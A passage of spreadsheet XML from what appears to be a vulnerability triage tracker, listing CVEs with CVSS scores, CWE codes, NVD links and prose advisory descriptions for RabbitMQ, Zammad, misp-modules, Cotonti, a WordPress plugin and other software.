      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61837</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67223</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. The advisory establishes affected 3.13, 4.0, 4.1, 4.2, and 4.3 maintenance lines but contains conflicting first-fixed versions for the 3.13, 4.0, and 4.1 lines. fill/2 substitutes ${username} into user_dn_pattern without RFC 4514 DN escaping, allowing a crafted username to alter the LDAP bind DN and potentially select a different directory entry. Exploitation requires rabbitmq_auth_backend_ldap with a user_dn_pattern containing ${username}, a directory layout in which the injected suffix resolves usefully, and a password valid for the resulting DN. The advisory body identifies 3.13.15, 4.0.20, 4.1.11, 4.2.9, and 4.3.3 as fixed, while structured metadata identifies 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3. No fixed-version assertion is certifiable until a curator resolves this conflict.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67223</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67225</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the stream protocol stored the FrameMax value negotiated during the Tune handshake but did not compare it with an inbound frame's declared length before buffering the frame. With the stream plugin enabled, a remote client could therefore cause excessive memory pressure and denial of service by declaring an oversized frame. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67225</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67230</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the Web STOMP WebSocket handler enforced neither max_frame_size nor login_timeout before authentication, allowing an unauthenticated client to keep a connection alive with a slow stream of small frames and accumulate unbounded pre-authentication state. The rabbitmq_web_stomp plugin must be enabled, and no authentication is required to reach the vulnerable path. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67230</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67242</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, OAuth2 isinteger(Exp) guard skips token-expiry checks for float exp. validatetokenexpiry/1 (lines 208-214) and expirytimestamp/1 (138-144) both guard with 'when isinteger(Exp)' and fall through to ok/never for float values. josejwt:verify validates only the signature, not exp. With float exp, no expiry validation occurs anywhere in the If the IdP emits exp as a JSON float (RFC 7519 permits fractional NumericDate), both the login-time expiry check and the mid-connection disconnect timer are silently skipped , an already-expired token is accepted, and connections never time OAuth2 backend enabled IdP emits float exp (uncommon; mainstream IdPs emit integers) Attacker possesses a previously-valid signed. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67242</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84463</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-79, CWE-838</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a user with Knowledge Base editing rights for a category can embed a video widget in a published answer with a specially crafted value. When the answer is rendered, that value is inserted into the page's HTML without being escaped for its attribute context, allowing it to break out and inject additional HTML into the page. When another user who has permission to switch between user sessions views the affected answer, the injected HTML causes their browser to silently send a request to Zammad's session-switching endpoint using their own active credentials. This results in switching their session to an account chosen by the person who wrote the Knowledge Base answer. No action is required from the viewer beyond opening the published answer. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84463</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97863</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>cisco, gin</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>The cisco_firesight_manager_ACL_rule_export module in misp-modules generates a shell script (.sh) that authenticates to and calls the Cisco fireSIGHT Manager API. The module interpolates configuration values (IP address, login, password, domain ID, policy ID) and MISP attribute values (destination IPs, URLs, event info comments) directly into single-quoted shell string assignments without any escaping or sanitization. Because the values are placed inside single-quoted shell strings, any value containing a single-quote character (e.g., a crafted ip-dst or url attribute value submitted to MISP) breaks out of the quoting context, allowing an attacker to inject arbitrary shell commands into the exported script. A security analyst who subsequently executes the generated .sh file unmodified would run the injected commands with their own privileges, potentially exposing fireSIGHT Manager credentials, modifying ACL rules, or compromising the analyst workstation. Additionally, the module contained a secondary defect where the variable 'config' was only assigned inside a conditional block but referenced unconditionally afterward, causing a NameError (denial of service) when the request payload lacked a 'config' key. The vulnerability requires the attacker to have the ability to submit MISP events or attributes containing a single-quote character and the victim to execute the exported script. No authentication bypass is required beyond standard MISP event-submission privileges.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97863</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97886</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file managevideos2.php. Such manipulation of the argument editassid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97886</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97895</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in krayin laravel-crm up to 2.2.5. This affects an unknown part of the file packages/Webkul/Admin/src/Http/Controllers/Settings/UserController.php of the component User Management. Executing a manipulation of the argument role_id can lead to improper privilege management. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.6 is able to mitigate this issue. This patch is called 5469d70336fbb25e8e513683e82b32982ce8aa82. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97895</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100237</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Thanks Extension allows Stored XSS.
This issue affects Mediawiki - Thanks Extension: from * before 1.43.10/1.45.5/1.46.1.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100237</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100521</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in the search plugin highlight parameter that performs no HTML or JavaScript escaping. Attackers can craft malicious links with injected JavaScript in the highlight parameter that executes in the browser of any visitor who opens the link, including administrators.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100521</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100522</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in message.php where the lng parameter is not properly escaped before output in the confirmation dialog. Unauthenticated attackers can craft malicious links with script payloads in the lng parameter to execute arbitrary JavaScript in victim browser sessions.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100522</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100523</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains an open redirect vulnerability in message.php that base64-decodes the redirect parameter without domain validation. Unauthenticated attackers can craft malicious links with encoded external URLs to redirect users to arbitrary sites via meta refresh tags for phishing attacks.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100523</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17577</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'uri' (and 'host') parameters in versions up to, and including, 4.7.42. The ssl_zen_messages::getMessages() function builds the 'token_missmatch' message using base64_decode(sanitize_text_field($_REQUEST['uri'])) and (optionally) base64_decode(sanitize_text_field($_REQUEST['host'])). sanitize_text_field() cannot strip HTML/JavaScript that is hidden inside a base64-encoded blob, and the resulting decoded raw HTML is echoed unescaped by showMessage() . This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17577</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18311</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android contains a cross-site scripting vulnerability due to missing HTML sanitization in its processing of imported document metadata. Attacker-controlled fields such as the author meta tag are inserted into a WebView via innerHTML, enabling stored XSS that executes on synced devices when the malicious document is opened.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18311</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18312</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
